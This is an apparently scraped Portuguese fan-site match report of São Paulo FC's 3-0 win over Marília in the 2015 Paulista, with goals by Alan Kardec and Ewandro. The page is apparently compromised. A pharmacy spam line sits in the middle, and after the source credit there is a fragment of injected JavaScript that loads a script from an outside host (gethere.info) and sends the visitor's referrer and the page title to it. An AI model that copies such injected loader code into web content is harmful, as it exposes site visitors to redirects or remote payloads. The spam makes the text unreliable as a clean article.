Destaque

Garotada dá show, e Tricolor encaminha classificação

O Tricolor está com ‘um pé’ nas quartas de final do Campeonato Paulista de 2015. Na tarde deste domingo (22), no Morumbi, o técnico Muricy Ramalho deu uma oportunidade aos atletas que não têm atuado com regularidade e, certamente, gostou do que viu. Arrasador desde os primeiros minutos, o ‘Expressinho’ venceu o Marília por 3 a 0 e mostrou que tem boas opções para o treinador utilizar na sequência da temporada.

Com gols de Alan Kardec (2) e Ewandro, o São Paulo não deu chance ao adversário e praticamente garantiu a sua vaga na próxima fase. O resultado positivo neste final de semana deixou o time são-paulino com 11 pontos de vantagem sobre o terceiro colocado do Grupo A, o Red Bull Brasil, que detém 15 – os dois melhores de cada chave. Depois do embate, restarão apenas mais quatro rodadas para o término da primeira fase – 12 pontos em disputa.

De quebra, a ‘garotada’ conseguiu manter os 100% de aproveitamento este ano. Nas duas vezes que o comandante escalou uma equipe totalmente diferente da que costuma atuar, o time correspondeu: vitórias sobre o Bragantino (5 x 0, em Bragança), Ponte Preta (2 x 1, em Campinas) e, agora, sobre o Marília, que não conseguiu segurar o quarteto formado por Boschilia, Centurión, Ewandro e Alan Kardec.

elenco spfc

Para encarar o clube do interior, o técnico Muricy Ramalho poupou os titulares e, assim, o Tricolor começou a partida com Rogério Ceni; Paulo Miranda, Edson Silva, Lucão e Auro; Rodrigo Caio, Thiago Mendes, Centurión e Boschilia; Ewandro e Alan Kardec.

Após entrar em campo com uma camisa azul, alusiva ao dia mundial da água, o São Paulo não perdeu tempo e tratou de pressionar os visitantes. Velocistas e habilidosos, Boschilia, Centurión e Ewandro partiram para cima do adversário e envolveram o Marília com facilidade. Logo aos três minutos, Centurión fez boa jogada pelo meio e rolou para Ewandro dentro da área. O atacante bateu rasteiro e a bola passou raspando a trave de Rodrigo Calchi.

Pouco depois, aos sete, o time são-paulino trocou passes na intermediária. Ewandro limpou para o meio do campo e bateu de esquerda, à direita do gol do Marília. Agudo e sem deixar a equipe do interior respirar, o ‘Expressinho’ ditava o ritmo do confronto com facilidade e não demorou para balançar as redes! Aos 17, Boschilia e Alan Kardec tabelaram perto da área e a bola sobrou para Ewandro, que bateu de primeira para abrir o placar no Morumbi! Golaço!

Superior e sem deixar o rival gostar do duelo, o Tricolor seguiu trocando passes no campo de ataque. A postura ofensiva do time são-paulino resultou em mais um gol, aos 15 minutos. O São Paulo roubou a bola no meio de campo, Boschilia recebeu e deu ótima assistência para Alan Kardec, que driblou o goleiro antes de tocar para o fundo do barbante: 2 a 0!

to order cheaply tablets without rx cheap pills elenco spfc

O Tricolor jogava sem ser incomodado pelo Marília, que ainda não conseguia chegar ao gol de Rogério Ceni. Os comandados de Muricy tabelavam com facilidade na entrada da área do adversário, que por pouco não sofreu o terceiro gol aos 29. Após cobrança de escanteio, Kardec subiu mais alto que a zaga e cabeceou na trave direita de Rodrigo Calchi.

Mesmo com 2 a 0 no marcador, os donos da casa não saíam do campo de ataque. No entanto, acuado e com a missão de conter as investidas dos mandantes, os visitantes conseguiram impedir que a torcida são-paulina comemorasse mais um gol antes do intervalo.

Na volta para o segundo tempo, com a mesma disposição, o Tricolor não deu vida fácil ao adversário. Aos dois minutos, Centurión tabelou com Auro pela esquerda, invadiu a área e tocou para trás. Alan Kardec fechava para marcar o terceiro, mas o Marília conseguiu se safar. Na sequência, aos 9, Auro deixou o argentino na cara do goleiro. O camisa 20 bateu de esquerda, mas em cima do arqueiro rival.

Daí em diante, o Marília até conseguiu segurar a bola no setor ofensivo, mas não finalizava com perigo. E depois de conseguir segurar a ‘resposta’ dos visitantes, os donos da casa marcaram o terceiro e arrancaram mais um grito de gol do torcedor nas arquibancadas. Aos 28, Ewandro roubou a bola de Thiago Gomes na linha de fundo, invadiu a área e tocou com capricho para Alan Kardec, que não perderia o gol nem se quisesse! O segundo dele no jogo: 3 a 0 e um pé nas quaras de final do Paulistão de 2015.

Fonte: SiteOficials.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

vinte − quatro =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Destaque

Mais em Destaque

Arboleda renasce diante do Bahia e mostra que tem bola para ser titular

saopauloadmin30 de novembro de 2020

Na Fonte Nova, São Paulo vence o Bahia por 3 a 1

saopauloadmin29 de novembro de 2020

Tricolor empata com o Ceará na Arena Castelão

saopauloadmin26 de novembro de 2020

Após mais de dois anos, Joao Rojas viaja com o elenco do São Paulo

saopauloadmin24 de novembro de 2020

São Paulo fica somente no empate com o Vasco no Morumbi

saopauloadmin22 de novembro de 2020

Dez motivos que fizeram o São Paulo dar a volta por cima

saopauloadmin20 de novembro de 2020

Tricolor elimina o Flamengo e avança para a semifinal na Copa do Brasil

saopauloadmin19 de novembro de 2020

Tricolor vence o Fortaleza e cola na liderança do Brasileirão

saopauloadmin15 de novembro de 2020

Brenner decide após falha e São Paulo abre vantagem contra o Flamengo na Copa do Brasil

saopauloadmin12 de novembro de 2020